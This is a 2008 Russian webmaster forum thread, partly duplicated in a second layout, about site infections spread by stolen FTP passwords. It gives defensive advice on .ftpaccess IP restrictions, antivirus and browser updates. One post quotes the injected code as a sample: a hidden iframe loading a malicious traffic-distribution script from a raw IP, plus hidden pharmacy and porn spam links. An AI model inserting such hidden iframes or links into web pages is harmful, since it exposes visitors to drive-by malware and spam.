Вирусы, вирусы, вирусы:( - Страница 2

kiev1 · 24.08.2008, 15:26

Цитата:

Сообщение от WebDigger

1. Меняем пароли доступа по ФТП

да, и вообще никогда не вводите логин-пароли работая в винде ни под каким предлогом - сейчас просто эпидемия взломов сайта через воровство паролей через виндовс трояны

Nokian · 24.08.2008, 16:34

Был у меня вирь opentraff.cn,сначала вписывал фреим в код главной страницы,а потом очищял код.Сменил пароль и больше не храню пароли в tхt)))

armagedon2005 · 24.08.2008, 17:15

Привет всем. Год назад я сталкнулся с проблемой вирусов на хосте, когда код вируса дописывается - вписывается после определённой фразы или в конце страницы, заражал страницы index.** main.** default.** и др. я долго с этим боролся:
1. поменял ФТП клиента,
2. написал своему хостеру о вирусах,
3. пароли везде поменял,
но ничего не помогало, тогда я начал лазить по нету и искать подобные проблемы и наткнулся на решение, которое и сейчас мне помогает.

Скрипт вируса: (один из типов).
--------------
<iframe style=display:none src="http://88.255.90.226/~yaksite/tds/index.php?out=1191758165"></iframe><div style=display:none><a href="http://medical-maps.150m.com/index.html">medical,tramadol,viagra,clonezepam,cia lis,pills</a>
<a href="http://all-porno-mapis.0catch.com/index.html">blow job,blow job free pic,all oral sex,oral super sex</a></div>


Имена заражаемых файлов:
-----------------------
default .php / html
index .php / html
header .php /html
footer .php / html
login .php /html
main .tpl / php / html

Решение броблемы:
-----------------
В сообщениях антивирусных служб появилась информация о вирусах, распространяющих себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код.
В каталоге FTP-аккаунта должен находиться файл с именем .ftpaccess. Если файла нет или файл пустой (нулевой длины) или же в нем строка с точкой (она входит в любой IP-адрес) - доступ открыт для любого IP.
Настройка .ftpaccess файла:
- Если в файле .ftpaccess поставить цифру 1, то доступ будет открыт для всех IP, в которые входит такая цифра.
- Если в этом файле вписать Ваш внешний IP-адрес, доступ будет закрыт для всех других. Это самая эффективная защита вашего сайта.
- Для тех, кто пользуется конструктором для сайтов. Вам необходимо вписать в файл: .ftpaccess IP-адрес вашего сайта и IP–адрес сервера где находится конструктор (обратитесь в нашу тех. поддержку за этим IP-адресом).
- Вписать нужный вам IP адрес в .ftpaccess вы можете с помощью FTP клиента или посредством Файл-менеджера в cPanel.
- Если Ваш IP динамический - можно прописать часть адреса, например: 195.131.185 или вписать несколько IP-адресов.
- Для того, чтобы прописать IP адрес с помощью cPanel, зайдите на вашу контрольную панель управления выберите Файл-менеджер, сделайте отметку для Home Directory и поставьые "галочку" в поле Show Hidden Files (dotfiles), кликните на кнопу “Go”. В списке файлов выберите файл .ftpaccess, кликните правой кнопкой вашей мышки на этот файл, в открывшемся контекстном меню выберите Edit File, далее редактируйте файл .ftpaccess.

Спасибо за внимание.

Wink · 24.08.2008, 17:18

Цитата:

Сообщение от armagedon2005

Решение броблемы:

Далеко не на всех хостингах есть поддержка .ftpaccess, даже на платных. Так что предварительно надо этот вопрос уточнять, иначе никакого смысла в этих манипуляциях нет

armagedon2005 · 24.08.2008, 18:16

Цитата:

Сообщение от Wink

Далеко не на всех хостингах есть поддержка .ftpaccess, даже на платных. Так что предварительно надо этот вопрос уточнять, иначе никакого смысла в этих манипуляциях нет

Согласен. Для этого нужно хостеру дать почитать этот топит и попросить включить такую защиту, а ещё чтоб на компе стоял хороший антивирус.
Почти на всех нормальных хостингах эта защита работает.

seocore · 24.08.2008, 20:23

ставьте нормальный антивирус, обновляйте IE до 7-ки + все секьюрные обновления винды = не будет такой проблемы

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Внимание! Вирусы!	Wink	Вопросы по работе системы	233	05.05.2009 10:02

24.08.2008, 16:34	#12
Nokian Специалист Регистрация: 27.02.2008 Адрес: Ой где это я? Сообщений: 102 Вес репутации: 0	Был у меня вирь opentraff.cn,сначала вписывал фреим в код главной страницы,а потом очищял код.Сменил пароль и больше не храню пароли в tхt)))

24.08.2008, 17:15	#13
armagedon2005 Новичок Регистрация: 06.11.2007 Сообщений: 18 Вес репутации: 0	Привет всем. Год назад я сталкнулся с проблемой вирусов на хосте, когда код вируса дописывается - вписывается после определённой фразы или в конце страницы, заражал страницы index. main. default. и др. я долго с этим боролся: 1. поменял ФТП клиента, 2. написал своему хостеру о вирусах, 3. пароли везде поменял, но ничего не помогало, тогда я начал лазить по нету и искать подобные проблемы и наткнулся на решение, которое и сейчас мне помогает. Скрипт вируса: (один из типов). -------------- <!-- o65 --><iframe style=display:none src="http://88.255.90.226/~yaksite/tds/index.php?out=1191758165"></iframe><div style=display:none><a href="http://medical-maps.150m.com/index.html">medical,tramadol,viagra,clonezepam,cia lis,pills</a> <a href="http://all-porno-mapis.0catch.com/index.html">blow job,blow job free pic,all oral sex,oral super sex</a></div> <!-- c65 --> Имена заражаемых файлов: ----------------------- default .php / html index .php / html header .php /html footer .php / html login .php /html main .tpl / php / html Решение броблемы:** ----------------- В сообщениях антивирусных служб появилась информация о вирусах, распространяющих себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код. В каталоге FTP-аккаунта должен находиться файл с именем .ftpaccess. Если файла нет или файл пустой (нулевой длины) или же в нем строка с точкой (она входит в любой IP-адрес) - доступ открыт для любого IP. Настройка .ftpaccess файла: - Если в файле .ftpaccess поставить цифру 1, то доступ будет открыт для всех IP, в которые входит такая цифра. - Если в этом файле вписать Ваш внешний IP-адрес, доступ будет закрыт для всех других. Это самая эффективная защита вашего сайта. - Для тех, кто пользуется конструктором для сайтов. Вам необходимо вписать в файл: .ftpaccess IP-адрес вашего сайта и IP–адрес сервера где находится конструктор (обратитесь в нашу тех. поддержку за этим IP-адресом). - Вписать нужный вам IP адрес в .ftpaccess вы можете с помощью FTP клиента или посредством Файл-менеджера в cPanel. - Если Ваш IP динамический - можно прописать часть адреса, например: 195.131.185 или вписать несколько IP-адресов. - Для того, чтобы прописать IP адрес с помощью cPanel, зайдите на вашу контрольную панель управления выберите Файл-менеджер, сделайте отметку для Home Directory и поставьые "галочку" в поле Show Hidden Files (dotfiles), кликните на кнопу “Go”. В списке файлов выберите файл .ftpaccess, кликните правой кнопкой вашей мышки на этот файл, в открывшемся контекстном меню выберите Edit File, далее редактируйте файл .ftpaccess. Спасибо за внимание.

24.08.2008, 20:23	#16
seocore Эксперт Регистрация: 18.06.2007 Адрес: Картофель Сообщений: 2,417 Вес репутации: 357	ставьте нормальный антивирус, обновляйте IE до 7-ки + все секьюрные обновления винды = не будет такой проблемы